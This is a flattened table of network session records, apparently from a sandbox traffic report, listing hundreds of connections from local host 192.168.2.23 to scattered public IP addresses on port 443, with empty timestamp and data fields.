                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27064192.168.2.2338810182.41.118.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27065192.168.2.235051418.49.50.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27066192.168.2.233744881.212.69.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27067192.168.2.2335460180.172.171.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27068192.168.2.2338228147.217.64.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27069192.168.2.2349872113.193.157.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27070192.168.2.2345282144.115.84.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27071192.168.2.2354100122.88.120.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27072192.168.2.233294051.124.67.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27073192.168.2.2334266190.35.188.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27074192.168.2.234278241.29.189.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27075192.168.2.2334938207.24.90.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27076192.168.2.2358162119.33.3.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27077192.168.2.233891847.6.33.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27078192.168.2.233398662.80.104.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27079192.168.2.2358920117.93.144.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27080192.168.2.235242625.192.144.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27081192.168.2.2335616184.30.207.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27082192.168.2.234321831.14.229.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27083192.168.2.234056670.31.234.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27084192.168.2.234128859.105.5.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27085192.168.2.2344526133.195.52.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27086192.168.2.235306040.232.255.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27087192.168.2.234509257.213.168.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27088192.168.2.2354806107.81.117.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27089192.168.2.2338114216.167.198.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27090192.168.2.2357064219.250.54.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27091192.168.2.2350652111.63.148.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27092192.168.2.2334368130.196.7.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27093192.168.2.2333422220.68.191.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27094192.168.2.233790646.192.43.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27095192.168.2.2358450145.67.103.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27096192.168.2.233497872.199.247.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27097192.168.2.2344292152.241.137.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27098192.168.2.2336216166.230.218.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27099192.168.2.2350698183.166.205.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27100192.168.2.235350837.34.30.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27101192.168.2.2354912205.160.104.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27102192.168.2.2353852219.207.222.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27103192.168.2.234201235.199.144.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27104192.168.2.233870897.91.94.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27105192.168.2.235012427.7.72.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27106192.168.2.2347380135.35.51.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27107192.168.2.2341214105.202.70.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27108192.168.2.2352322204.190.109.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27109192.168.2.2332972146.159.53.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27110192.168.2.2338970169.53.113.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27111192.168.2.235402079.166.27.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27112192.168.2.2345082163.67.239.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27113192.168.2.2356650121.27.237.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27114192.168.2.233381248.246.244.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27115192.168.2.2345590140.225.156.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27116192.168.2.236075299.219.54.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27117192.168.2.2337718185.250.194.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27118192.168.2.2332992108.201.144.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27119192.168.2.2350400159.235.82.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27120192.168.2.233334218.229.228.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27121192.168.2.2345328206.75.205.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27122192.168.2.235866051.74.103.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27123192.168.2.2356816124.110.11.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27124192.168.2.234288083.86.253.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27125192.168.2.2338708164.250.152.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27126192.168.2.233297867.120.52.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27127192.168.2.235308017.141.129.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27128192.168.2.233338657.21.76.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27129192.168.2.2338542222.172.228.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27130192.168.2.23430981.227.90.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27131192.168.2.2360292107.32.124.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27132192.168.2.2355660140.31.208.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27133192.168.2.233700250.154.140.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27134192.168.2.2352422220.229.5.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27135192.168.2.235809077.244.160.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27136192.168.2.2338676173.236.248.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27137192.168.2.2359994126.241.60.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27138192.168.2.2338360138.77.253.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27139192.168.2.233279642.183.198.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27140192.168.2.2333416108.35.219.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27141192.168.2.234492244.218.117.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27142192.168.2.2352732156.210.253.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27143192.168.2.2339606174.10.212.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27144192.168.2.234783645.164.161.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27145192.168.2.236070281.16.141.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27146192.168.2.235230269.246.147.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27147192.168.2.2349574151.101.225.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27148192.168.2.2346440154.151.58.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27149192.168.2.23369261.22.9.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27150192.168.2.2356016119.195.24.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27151192.168.2.2345416175.90.135.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27152192.168.2.235272262.57.80.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27153192.168.2.234599093.229.158.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27154192.168.2.2345662113.64.164.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27155192.168.2.2338258152.181.246.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27156192.168.2.2345418212.55.200.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27157192.168.2.2335714135.40.191.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27158192.168.2.2354628173.195.113.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27159192.168.2.235987257.219.61.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27160192.168.2.234289459.175.24.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27161192.168.2.2352044212.243.228.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27162192.168.2.2337358186.111.11.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27163192.168.2.2342800157.114.167.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27164192.168.2.2356192107.6.199.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27165192.168.2.2360762104.185.125.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27166192.168.2.2355538213.122.8.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27167192.168.2.2360018118.253.245.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27168192.168.2.2356998211.23.187.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27169192.168.2.2359972100.127.130.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27170192.168.2.2345934150.233.140.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27171192.168.2.233819488.150.82.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27172192.168.2.2343358146.23.45.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27173192.168.2.233770813.34.197.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27174192.168.2.233376670.111.117.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27175192.168.2.2353824170.37.247.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27176192.168.2.2334362125.121.240.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27177192.168.2.235369627.251.92.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27178192.168.2.2342054216.50.149.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27179192.168.2.233712469.18.99.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27180192.168.2.2336648219.163.128.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27181192.168.2.2351860136.101.127.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27182192.168.2.2338662123.188.50.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27183192.168.2.2345998198.167.240.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27184192.168.2.2360932195.141.156.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27185192.168.2.234253080.249.31.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27186192.168.2.2335144172.115.76.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27187192.168.2.236029040.240.172.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27188192.168.2.235418035.146.170.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27189192.168.2.2345414115.4.123.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27190192.168.2.2337374118.245.42.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27191192.168.2.234812037.248.147.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27192192.168.2.2358546104.13.47.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27193192.168.2.234315892.26.96.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27194192.168.2.2348132148.82.188.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27195192.168.2.234550483.110.73.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27196192.168.2.2338086137.35.92.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27197192.168.2.2335598118.144.17.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27198192.168.2.2335686103.47.184.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27199192.168.2.2340416149.9.110.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27200192.168.2.235696691.248.193.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27201192.168.2.234672024.102.243.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27202192.168.2.235936653.31.60.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27203192.168.2.2343650108.93.226.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27204192.168.2.2360528114.182.16.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27205192.168.2.235186612.158.155.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27206192.168.2.235598488.68.194.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27207192.168.2.2352580219.200.209.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27208192.168.2.235995667.235.133.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27209192.168.2.235100627.75.190.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27210192.168.2.2342606204.26.65.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27211192.168.2.2360938194.105.73.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27212192.168.2.2348980174.91.43.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27213192.168.2.2336874150.84.205.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27214192.168.2.2341690175.84.63.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27215192.168.2.2360476122.121.162.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27216192.168.2.2339890169.77.108.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27217192.168.2.2353152182.93.5.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27218192.168.2.2338368160.145.142.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27219192.168.2.2342886192.179.12.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27220192.168.2.2339060199.163.29.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27221192.168.2.23502964.113.58.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27222192.168.2.2334582176.153.30.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27223192.168.2.235030050.40.94.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27224192.168.2.233648666.118.228.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27225192.168.2.2342218153.174.255.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27226192.168.2.23401862.171.241.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27227192.168.2.2356194126.176.162.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27228192.168.2.2358536203.245.41.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27229192.168.2.2350104122.218.179.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27230192.168.2.2339660173.212.11.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27231192.168.2.2352360102.214.47.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27232192.168.2.235122418.215.209.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27233192.168.2.2340494197.45.236.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27234192.168.2.2337874223.223.132.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27235192.168.2.2360666207.140.112.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27236192.168.2.2354410181.251.139.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27237192.168.2.2346700205.18.121.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27238192.168.2.234546236.95.193.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27239192.168.2.234197618.10.59.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27240192.168.2.234661884.136.181.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27241192.168.2.2333540117.163.56.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27242192.168.2.2336628135.163.43.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27243192.168.2.2350860210.7.29.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27244192.168.2.2359120110.10.105.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27245192.168.2.2335976129.135.192.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27246192.168.2.2333908114.193.54.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27247192.168.2.234006471.74.218.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27248192.168.2.2357932156.18.160.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27249192.168.2.233667845.136.243.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27250192.168.2.2342002122.62.60.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27251192.168.2.2356296162.250.235.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27252192.168.2.2345368223.7.19.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27253192.168.2.235030090.125.167.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27254192.168.2.234819651.53.106.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27255192.168.2.2359616129.65.232.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27256192.168.2.2343562183.201.51.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27257192.168.2.2342750137.198.189.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27258192.168.2.2340818141.62.255.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27259192.168.2.2342070135.138.127.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27260192.168.2.233588270.115.55.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27261192.168.2.234817440.204.30.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27262192.168.2.235508242.3.82.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27263192.168.2.236069658.245.12.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27264192.168.2.2333076155.108.123.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27265192.168.2.23394021.103.167.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27266192.168.2.234415899.237.13.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27267192.168.2.233404667.2.84.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27268192.168.2.233413484.243.209.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27269192.168.2.236039447.167.81.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27270192.168.2.2354166210.207.192.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27271192.168.2.2346118196.91.7.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27272192.168.2.2333466208.196.153.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27273192.168.2.235423279.162.196.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27274192.168.2.235313067.232.151.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27275192.168.2.2358654222.82.3.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27276192.168.2.2347976178.222.219.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27277192.168.2.2339680168.241.129.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27278192.168.2.234534423.56.222.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27279192.168.2.2354406179.72.178.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27280192.168.2.2349532175.21.119.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27281192.168.2.2339926111.169.6.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27282192.168.2.2349706213.109.136.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27283192.168.2.2360250154.233.231.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27284192.168.2.233930451.239.109.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
